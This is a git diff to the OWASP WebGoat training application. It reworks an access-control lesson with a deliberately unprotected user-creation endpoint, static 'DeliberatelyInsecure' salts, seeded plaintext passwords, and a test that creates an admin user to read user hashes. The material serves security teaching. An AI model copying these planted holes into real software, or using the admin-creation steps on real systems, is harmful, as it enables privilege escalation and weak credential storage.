--- a/webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/users/WebGoatUser.java
@@ -34,15 +34,14 @@ public class WebGoatUser implements UserDetails {
     }
 
     public WebGoatUser(String username, String password) {
-        this.username = username;
-        this.password = password;
-        createUser();
+        this(username, password, ROLE_USER);
     }
 
     public WebGoatUser(String username, String password, String role) {
         this.username = username;
         this.password = password;
         this.role = role;
+        createUser();
     }
 
 
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java
index da39a8c5f..cc51704b2 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/AccessControlTest.java
@@ -1,54 +1,87 @@
 package org.owasp.webgoat;
 
 
+import io.restassured.RestAssured;
+import io.restassured.http.ContentType;
+import org.apache.http.HttpStatus;
+import org.junit.jupiter.api.Test;
+
 import java.util.HashMap;
 import java.util.Map;
 
-import org.junit.jupiter.api.Test;
-
-import io.restassured.RestAssured;
-import io.restassured.http.ContentType;
-import lombok.Data;
-
 public class AccessControlTest extends IntegrationTest {
-	
-	@Test
+
+    @Test
     public void testLesson() {
-    	startLesson("MissingFunctionAC");      
-    	
-    	Map<String, Object> params = new HashMap<>();
-        params.clear();
-        params.put("hiddenMenu1", "Users");
-        params.put("hiddenMenu2", "Config");
-       
-    	
-        checkAssignment(url("/WebGoat/access-control/hidden-menu"), params, true);
-        String userHash = 
+        startLesson("MissingFunctionAC");
+        assignment1();
+        assignment2();
+        assignment3();
+
+        checkResults("/access-control");
+    }
+
+    private void assignment3() {
+        //direct call should fail if user has not been created
+        RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .contentType(ContentType.JSON)
+                .get(url("/WebGoat/access-control/users-admin-fix"))
+                .then()
+                .statusCode(HttpStatus.SC_FORBIDDEN);
+
+        //create user
+        var userTemplate = """
+                {"username":"%s","password":"%s","admin": "true"}
+                """;
+        RestAssured.given()
+                .when()
+                .relaxedHTTPSValidation()
+                .cookie("JSESSIONID", getWebGoatCookie())
+                .contentType(ContentType.JSON)
+                .body(String.format(userTemplate, getWebgoatUser(), getWebgoatUser()))
+                .post(url("/WebGoat/access-control/users"))
+                .then()
+                .statusCode(HttpStatus.SC_OK);
+
+        //get the users
+        var userHash =
                 RestAssured.given()
                         .when()
                         .relaxedHTTPSValidation()
                         .cookie("JSESSIONID", getWebGoatCookie())
-                        .contentType(ContentType.JSON) 
-                        .get(url("/WebGoat/users"))
+                        .contentType(ContentType.JSON)
+                        .get(url("/WebGoat/access-control/users-admin-fix"))
                         .then()
                         .statusCode(200)
                         .extract()
                         .jsonPath()
-                        .get("find { it.username == \"" + getWebgoatUser() + "\" }.userHash");
-        
-    	params.clear();
-       	params.put("userHash", userHash);
-        checkAssignment(url("/WebGoat/access-control/user-hash"), params, true);
-         
-  
-        checkResults("/access-control");        
+                        .get("find { it.username == \"Jerry\" }.userHash");
+
+        checkAssignment(url("/WebGoat/access-control/user-hash-fix"), Map.of("userHash", userHash), true);
     }
-    
-	@Data
-    public class Item {
-        private String username;
-        private boolean admin;
-        private String userHash;
+
+    private void assignment2() {
+        var userHash =
+                RestAssured.given()
+                        .when()
+                        .relaxedHTTPSValidation()
+                        .cookie("JSESSIONID", getWebGoatCookie())
+                        .contentType(ContentType.JSON)
+                        .get(url("/WebGoat/access-control/users"))
+                        .then()
+                        .statusCode(200)
+                        .extract()
+                        .jsonPath()
+                        .get("find { it.username == \"Jerry\" }.userHash");
+
+        checkAssignment(url("/WebGoat/access-control/user-hash"), Map.of("userHash", userHash), true);
+    }
+
+    private void assignment1() {
+        var params = Map.of("hiddenMenu1", "Users", "hiddenMenu2", "Config");
+        checkAssignment(url("/WebGoat/access-control/hidden-menu"), params, true);
     }
-    
 }
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/DisplayUser.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/DisplayUser.java
index f96360c8c..bb07cf284 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/DisplayUser.java
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/DisplayUser.java
@@ -1,8 +1,8 @@
 package org.owasp.webgoat.missing_ac;
 
-import org.owasp.webgoat.users.WebGoatUser;
-import org.springframework.security.core.GrantedAuthority;
+import lombok.Getter;
 
+import java.nio.charset.StandardCharsets;
 import java.security.MessageDigest;
 import java.util.Base64;
 
@@ -31,55 +31,32 @@ import java.util.Base64;
  * projects.
  * <p>
  */
-
+@Getter
 public class DisplayUser {
     //intended to provide a display version of WebGoatUser for admins to view user attributes
 
-
     private String username;
     private boolean admin;
     private String userHash;
 
-    public DisplayUser(WebGoatUser user) {
+    public DisplayUser(User user, String passwordSalt) {
         this.username = user.getUsername();
-        this.admin = false;
+        this.admin = user.isAdmin();
 
-        for (GrantedAuthority authority : user.getAuthorities()) {
-            this.admin = (authority.getAuthority().contains("WEBGOAT_ADMIN")) ? true : false;
-        }
-
-        // create userHash on the fly
-        //TODO: persist userHash
         try {
-            this.userHash = genUserHash(user.getUsername(), user.getPassword());
+            this.userHash = genUserHash(user.getUsername(), user.getPassword(), passwordSalt);
         } catch (Exception ex) {
-            //TODO: implement better fallback operation
             this.userHash = "Error generating user hash";
         }
-
     }
 
-    protected String genUserHash(String username, String password) throws Exception {
+    protected String genUserHash(String username, String password, String passwordSalt) throws Exception {
         MessageDigest md = MessageDigest.getInstance("SHA-256");
         // salting is good, but static & too predictable ... short too for a salt
-        String salted = password + "DeliberatelyInsecure1234" + username;
+        String salted = password + passwordSalt + username;
         //md.update(salted.getBytes("UTF-8")); // Change this to "UTF-16" if needed
-        byte[] hash = md.digest(salted.getBytes("UTF-8"));
-        String encoded = Base64.getEncoder().encodeToString(hash);
-        return encoded;
-    }
-
-
-    public String getUsername() {
-        return username;
-    }
-
-    public boolean isAdmin() {
-        return admin;
-    }
-
-    public String getUserHash() {
-        return userHash;
+        byte[] hash = md.digest(salted.getBytes(StandardCharsets.UTF_8));
+        return Base64.getEncoder().encodeToString(hash);
     }
 
 }
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingAccessControlUserRepository.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingAccessControlUserRepository.java
new file mode 100644
index 000000000..51a6fe726
--- /dev/null
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingAccessControlUserRepository.java
@@ -0,0 +1,45 @@
+package org.owasp.webgoat.missing_ac;
+
+import org.owasp.webgoat.LessonDataSource;
+import org.springframework.jdbc.core.RowMapper;
+import org.springframework.jdbc.core.namedparam.MapSqlParameterSource;
+import org.springframework.jdbc.core.namedparam.NamedParameterJdbcTemplate;
+import org.springframework.stereotype.Component;
+import org.springframework.util.CollectionUtils;
+
+import java.util.List;
+
+@Component
+public class MissingAccessControlUserRepository {
+
+    private final NamedParameterJdbcTemplate jdbcTemplate;
+    private final RowMapper<User> mapper = (rs, rowNum) -> new User(rs.getString("username"), rs.getString("password"), rs.getBoolean("admin"));
+
+    public MissingAccessControlUserRepository(LessonDataSource lessonDataSource) {
+        this.jdbcTemplate = new NamedParameterJdbcTemplate(lessonDataSource);
+    }
+
+    public List<User> findAllUsers() {
+        return jdbcTemplate.query("select username, password, admin from access_control_users", mapper);
+    }
+
+    public User findByUsername(String username) {
+        var users = jdbcTemplate.query("select username, password, admin from access_control_users where username=:username",
+                new MapSqlParameterSource().addValue("username", username),
+                mapper);
+        if (CollectionUtils.isEmpty(users)) {
+            return null;
+        }
+        return users.get(0);
+    }
+
+    public User save(User user) {
+        jdbcTemplate.update("INSERT INTO access_control_users(username, password, admin) VALUES(:username,:password,:admin)",
+                new MapSqlParameterSource()
+                        .addValue("username", user.getUsername())
+                        .addValue("password", user.getPassword())
+                        .addValue("admin", user.isAdmin()));
+        return user;
+    }
+
+}
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionAC.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionAC.java
index b126b44f9..8a6900c9b 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionAC.java
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionAC.java
@@ -27,7 +27,10 @@ import org.owasp.webgoat.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
-public class MissingFunctionAC  extends Lesson {
+public class MissingFunctionAC extends Lesson {
+
+    public static final String PASSWORD_SALT_SIMPLE = "DeliberatelyInsecure1234";
+    public static final String PASSWORD_SALT_ADMIN = "DeliberatelyInsecure1235";
 
     @Override
     public Category getDefaultCategory() {
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
index baa487694..d588da180 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACHiddenMenus.java
@@ -25,8 +25,6 @@ package org.owasp.webgoat.missing_ac;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
@@ -37,10 +35,6 @@ import org.springframework.web.bind.annotation.RestController;
 @RestController
 @AssignmentHints({"access-control.hidden-menus.hint1","access-control.hidden-menus.hint2","access-control.hidden-menus.hint3"})
 public class MissingFunctionACHiddenMenus extends AssignmentEndpoint {
-    //UserSessionData is bound to session and can be used to persist data across multiple assignments
-    @Autowired
-    UserSessionData userSessionData;
-
 
     @PostMapping(path = "/access-control/hidden-menu", produces = {"application/json"})
     @ResponseBody
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsers.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsers.java
index 82de67200..64fb15015 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsers.java
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACUsers.java
@@ -22,79 +22,82 @@
 
 package org.owasp.webgoat.missing_ac;
 
+import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.users.UserService;
-import org.owasp.webgoat.users.WebGoatUser;
-import org.springframework.beans.factory.annotation.Autowired;
+import org.owasp.webgoat.session.WebSession;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.ResponseEntity;
 import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestBody;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.servlet.ModelAndView;
 
-import javax.servlet.http.HttpServletRequest;
 import java.util.ArrayList;
 import java.util.List;
+import java.util.stream.Collectors;
+
+import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
 
 /**
  * Created by jason on 1/5/17.
  */
-
 @Controller
+@AllArgsConstructor
 @Slf4j
 public class MissingFunctionACUsers {
 
-    // this will actually put controllers on the /WebGoat/* path ... the jsp for list_users restricts what can be seen, but the add_user is not controlled carefully
-    @Autowired
-    private UserService userService;
+    private final MissingAccessControlUserRepository userRepository;
+    private final WebSession webSession;
 
-    @RequestMapping(path = {"users"}, method = RequestMethod.GET)
-    public ModelAndView listUsers(HttpServletRequest request) {
+    @GetMapping(path = {"access-control/users"})
+    public ModelAndView listUsers() {
 
         ModelAndView model = new ModelAndView();
         model.setViewName("list_users");
-        List<WebGoatUser> allUsers = userService.getAllUsers();
-        model.addObject("numUsers",allUsers.size());
+        List<User> allUsers = userRepository.findAllUsers();
+        model.addObject("numUsers", allUsers.size());
         //add display user objects in place of direct users
         List<DisplayUser> displayUsers = new ArrayList<>();
-        for (WebGoatUser user : allUsers) {
-            displayUsers.add(new DisplayUser(user));
+        for (User user : allUsers) {
+            displayUsers.add(new DisplayUser(user, PASSWORD_SALT_SIMPLE));
         }
-        model.addObject("allUsers",displayUsers);
+        model.addObject("allUsers", displayUsers);
 
         return model;
     }
 
-    @RequestMapping(path = {"users", "/"}, method = RequestMethod.GET,consumes = "application/json")
+    @GetMapping(path = {"access-control/users"}, consumes = "application/json")
     @ResponseBody
-    public List<DisplayUser> usersService(HttpServletRequest request) {
-
-        List<WebGoatUser> allUsers = userService.getAllUsers();
-        List<DisplayUser> displayUsers = new ArrayList<>();
-        for (WebGoatUser user : allUsers) {
-            displayUsers.add(new DisplayUser(user));
-        }
-        return displayUsers;
+    public ResponseEntity<List<DisplayUser>> usersService() {
+        return ResponseEntity.ok(userRepository.findAllUsers().stream().map(user -> new DisplayUser(user, PASSWORD_SALT_SIMPLE)).collect(Collectors.toList()));
     }
 
-    @RequestMapping(path = {"users","/"}, method = RequestMethod.POST, consumes = "application/json", produces = "application/json")
+    @GetMapping(path = {"access-control/users-admin-fix"}, consumes = "application/json")
     @ResponseBody
-    //@PreAuthorize()
-    public WebGoatUser addUser(@RequestBody WebGoatUser newUser) {
+    public ResponseEntity<List<DisplayUser>> usersFixed() {
+        var currentUser = userRepository.findByUsername(webSession.getUserName());
+        if (currentUser != null && currentUser.isAdmin()) {
+            return ResponseEntity.ok(userRepository.findAllUsers().stream().map(user -> new DisplayUser(user, PASSWORD_SALT_ADMIN)).collect(Collectors.toList()));
+        }
+        return ResponseEntity.status(HttpStatus.FORBIDDEN).build();
+    }
+
+    @PostMapping(path = {"access-control/users", "access-control/users-admin-fix"}, consumes = "application/json", produces = "application/json")
+    @ResponseBody
+    public User addUser(@RequestBody User newUser) {
         try {
-            userService.addUser(newUser.getUsername(),newUser.getPassword());
-            return userService.loadUserByUsername(newUser.getUsername());
+            userRepository.save(newUser);
+            return newUser;
         } catch (Exception ex) {
             log.error("Error creating new User", ex);
-            //TODO: implement error handling ...
-        } finally {
-            // no streams or other resources opened ... nothing to do, right?
+            return null;
         }
-        return null;
+
+        //@RequestMapping(path = {"user/{username}","/"}, method = RequestMethod.DELETE, consumes = "application/json", produces = "application/json")
+        //TODO implement delete method with id param and authorization
+
     }
-
-    //@RequestMapping(path = {"user/{username}","/"}, method = RequestMethod.DELETE, consumes = "application/json", produces = "application/json")
-    //TODO implement delete method with id param and authorization
-
 }
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHash.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHash.java
index d5a8920cd..41815d07f 100644
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHash.java
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHash.java
@@ -22,35 +22,33 @@
 
 package org.owasp.webgoat.missing_ac;
 
+import lombok.RequiredArgsConstructor;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.users.UserService;
-import org.owasp.webgoat.users.WebGoatUser;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
+import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_SIMPLE;
+
 @RestController
-@AssignmentHints({"access-control.hash.hint1","access-control.hash.hint2","access-control.hash.hint3",
-        "access-control.hash.hint4","access-control.hash.hint5","access-control.hash.hint6","access-control.hash.hint7",
-        "access-control.hash.hint8","access-control.hash.hint9","access-control.hash.hint10","access-control.hash.hint11","access-control.hash.hint12"})
+@AssignmentHints({"access-control.hash.hint1", "access-control.hash.hint2", "access-control.hash.hint3", "access-control.hash.hint4", "access-control.hash.hint5"})
+@RequiredArgsConstructor
 public class MissingFunctionACYourHash extends AssignmentEndpoint {
 
-    @Autowired
-    private UserService userService;
+    private final MissingAccessControlUserRepository userRepository;
+
 
     @PostMapping(path = "/access-control/user-hash", produces = {"application/json"})
     @ResponseBody
-    public AttackResult completed(String userHash) {
-        String currentUser = getWebSession().getUserName();
-        WebGoatUser user = userService.loadUserByUsername(currentUser);
-        DisplayUser displayUser = new DisplayUser(user);
+    public AttackResult simple(String userHash) {
+        User user = userRepository.findByUsername("Jerry");
+        DisplayUser displayUser = new DisplayUser(user, PASSWORD_SALT_SIMPLE);
         if (userHash.equals(displayUser.getUserHash())) {
             return success(this).feedback("access-control.hash.success").build();
         } else {
-            return failed(this).feedback("access-control.hash.close").build();
+            return failed(this).build();
         }
     }
 }
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdmin.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdmin.java
new file mode 100644
index 000000000..d0c03e070
--- /dev/null
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/MissingFunctionACYourHashAdmin.java
@@ -0,0 +1,60 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2019 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.missing_ac;
+
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentHints;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RestController;
+
+import static org.owasp.webgoat.missing_ac.MissingFunctionAC.PASSWORD_SALT_ADMIN;
+
+@RestController
+@AssignmentHints({"access-control.hash.hint6", "access-control.hash.hint7",
+        "access-control.hash.hint8", "access-control.hash.hint9", "access-control.hash.hint10", "access-control.hash.hint11", "access-control.hash.hint12"})
+public class MissingFunctionACYourHashAdmin extends AssignmentEndpoint {
+
+    private final MissingAccessControlUserRepository userRepository;
+
+    public MissingFunctionACYourHashAdmin(MissingAccessControlUserRepository userRepository) {
+        this.userRepository = userRepository;
+    }
+
+    @PostMapping(path = "/access-control/user-hash-fix", produces = {"application/json"})
+    @ResponseBody
+    public AttackResult admin(String userHash) {
+        //current user should be in the DB
+        //if not admin then return 403
+
+        var user = userRepository.findByUsername("Jerry");
+        var displayUser = new DisplayUser(user, PASSWORD_SALT_ADMIN);
+        if (userHash.equals(displayUser.getUserHash())) {
+            return success(this).feedback("access-control.hash.success").build();
+        } else {
+            return failed(this).feedback("access-control.hash.close").build();
+        }
+    }
+
+}
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/User.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/User.java
new file mode 100644
index 000000000..5025a7d82
--- /dev/null
+++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/User.java
@@ -0,0 +1,15 @@
+package org.owasp.webgoat.missing_ac;
+
+import lombok.AllArgsConstructor;
+import lombok.Data;
+import lombok.NoArgsConstructor;
+
+@Data
+@AllArgsConstructor
+@NoArgsConstructor
+public class User {
+
+    private String username;
+    private String password;
+    private boolean admin;
+}
diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/Users.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/Users.java
deleted file mode 100644
index 460bcae58..000000000
--- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/missing_ac/Users.java
+++ /dev/null
@@ -1,117 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 2019 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
- */
-
-package org.owasp.webgoat.missing_ac;
-
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.session.UserSessionData;
-import org.springframework.web.bind.annotation.GetMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.HashMap;
-
-public class Users {
-
-    private UserSessionData userSessionData;
-    private LessonDataSource dataSource;
-
-    public Users(UserSessionData userSessionData, LessonDataSource dataSource) {
-        this.userSessionData = userSessionData;
-        this.dataSource = dataSource;
-    }
-
-    @GetMapping(produces = {"application/json"})
-    @ResponseBody
-    protected HashMap<Integer, HashMap> getUsers() {
-
-        try (Connection connection = dataSource.getConnection()) {
-            String query = "SELECT * FROM user_data";
-
-            try {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                        ResultSet.CONCUR_READ_ONLY);
-                ResultSet results = statement.executeQuery(query);
-                HashMap<Integer, HashMap> allUsersMap = new HashMap();
-
-                if ((results != null) && (results.first() == true)) {
-                    while (results.next()) {
-                        HashMap<String, String> userMap = new HashMap<>();
-                        userMap.put("first", results.getString(1));
-                        userMap.put("last", results.getString(2));
-                        userMap.put("cc", results.getString(3));
-                        userMap.put("ccType", results.getString(4));
-                        userMap.put("cookie", results.getString(5));
-                        userMap.put("loginCount", Integer.toString(results.getInt(6)));
-                        allUsersMap.put(results.getInt(0), userMap);
-                    }
-                    userSessionData.setValue("allUsers", allUsersMap);
-                    return allUsersMap;
-
-                }
-            } catch (SQLException sqle) {
-                sqle.printStackTrace();
-                HashMap<String, String> errMap = new HashMap() {{
-                    put("err", sqle.getErrorCode() + "::" + sqle.getMessage());
-                }};
-
-                return new HashMap<Integer, HashMap>() {{
-                    put(0, errMap);
-                }};
-            } catch (Exception e) {
-                e.printStackTrace();
-                HashMap<String, String> errMap = new HashMap() {{
-                    put("err", e.getMessage() + "::" + e.getCause());
-                }};
-                e.printStackTrace();
-                return new HashMap<Integer, HashMap>() {{
-                    put(0, errMap);
-                }};
-
-
-            } finally {
-                try {
-                    if (connection != null) {
-                        connection.close();
-                    }
-                } catch (SQLException sqle) {
-                    sqle.printStackTrace();
-                }
-            }
-
-        } catch (Exception e) {
-            e.printStackTrace();
-            HashMap<String, String> errMap = new HashMap() {{
-                put("err", e.getMessage() + "::" + e.getCause());
-            }};
-            e.printStackTrace();
-            return new HashMap<>() {{
-                put(0, errMap);
-            }};
-
-        }
-        return null;
-    }
-}
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css b/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
new file mode 100644
index 000000000..853250ac2
--- /dev/null
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/css/ac.css
@@ -0,0 +1,4 @@
+.hidden-menu-item {
+    display:none;
+    visibility:hidden;
+}
\ No newline at end of file
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/db/migration/V2021_11_03_1__ac.sql b/webgoat-lessons/missing-function-ac/src/main/resources/db/migration/V2021_11_03_1__ac.sql
new file mode 100644
index 000000000..7a7b09b58
--- /dev/null
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/db/migration/V2021_11_03_1__ac.sql
@@ -0,0 +1,9 @@
+CREATE TABLE access_control_users(
+  username varchar(40),
+  password varchar(40),
+  admin boolean
+);
+
+INSERT INTO access_control_users VALUES ('Tom', 'qwertyqwerty1234', false);
+INSERT INTO access_control_users VALUES ('Jerry', 'doesnotreallymatter', true);
+INSERT INTO access_control_users VALUES ('Sylvester', 'testtesttest', false);
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html b/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
index c3465584c..49c42e774 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/html/MissingFunctionAC.html
@@ -5,6 +5,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
+    <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/ac.css}"/>
     <div class="adoc-content" th:replace="doc:missing-function-ac-02-client-controls.adoc"></div>
 
     <div class="attack-container">
@@ -17,7 +18,6 @@
 
                 <div class="collapse navbar-collapse" id="alignment-example">
 
-                    <!-- Links -->
                     <ul class="nav navbar-nav">
                         <li class="dropdown">
                             <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Account<span class="caret"></span></a>
@@ -37,8 +37,9 @@
                         <li class="hidden-menu-item dropdown">
                             <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Admin<span class="caret"></span></a>
                             <ul class="dropdown-menu" aria-labelledby="admin">
-                                <li><a href="/users">Users</a></li>
-                                <li><a href="/config">Config</a></li>
+                                <li><a href="/access-control/users">Users</a></li>
+                                <li><a href="/access-control/users-admin-fix">Users</a></li>
+                                <li><a href="/access-control/config">Config</a></li>
                             </ul>
                         </li>
                     </ul>
@@ -89,4 +90,26 @@
 
 </div>
 
+<div class="lesson-page-wrapper">
+
+    <div class="adoc-content" th:replace="doc:missing-function-ac-04-users-fixed.adoc"></div>
+
+    <div class="attack-container">
+        <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+        <form class="attack-form" accept-charset="UNKNOWN"
+              method="POST" name="form"
+              action="/WebGoat/access-control/user-hash-fix">
+
+            <p>Your Hash: <input name="userHash" value="" type="TEXT"/></p>
+            <br/>
+            <input name="submit" value="Submit" type="SUBMIT"/>
+
+        </form>
+
+        <div class="attack-feedback"></div>
+        <div class="attack-output"></div>
+    </div>
+
+</div>
+
 </html>
diff --git a/webgoat-lessons/missing-function-ac/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/missing-function-ac/src/main/resources/i18n/WebGoatLabels.properties
index 4533fe073..f727c90ce 100644
--- a/webgoat-lessons/missing-function-ac/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/missing-function-ac/src/main/resources/i18n/WebGoatLabels.properties
@@ -11,15 +11,15 @@ access-control.hidden-menus.hint3=Look for something a super-user or administato
 access-control.hash.success=Congrats! You really succeeded when you added the user.
 access-control.hash.close=Keep trying, this one may take several attempts & steps to achieve. See the hints for help.
 
-access-control.hash.hint1=There is an easier way and a 'harder' way to achieve this, the easier way involves one simple change in a GET request.
-access-control.hash.hint2= If you haven't found the hidden menus from the earlier exercise, go do that first.
-access-control.hash.hint3=When you look at the users page, there is a hint that more info is viewable by a given role. 
-access-control.hash.hint4=For the easy way, have you tried tampering the GET request? Different content-types?
-access-control.hash.hint5=For the 'easy' way, modify the GET request to /users to include 'Content-Type: application/json'
+access-control.hash.hint1=This assignment involves one simple change in a GET request.
+access-control.hash.hint2=If you haven't found the hidden menus from the earlier exercise, go do that first.
+access-control.hash.hint3=When you look at the users page, there is a hint that more info is viewable by a given role.
+access-control.hash.hint4=Have you tried tampering the GET request? Different content-types?
+access-control.hash.hint5=Modify the GET request to `/access-control/users` to include 'Content-Type: application/json'
 access-control.hash.hint6=Now for the harder way ... it builds on the easier way
 access-control.hash.hint7=If the request to view users, were a 'service' or 'RESTful' endpoint, what would be different about it?
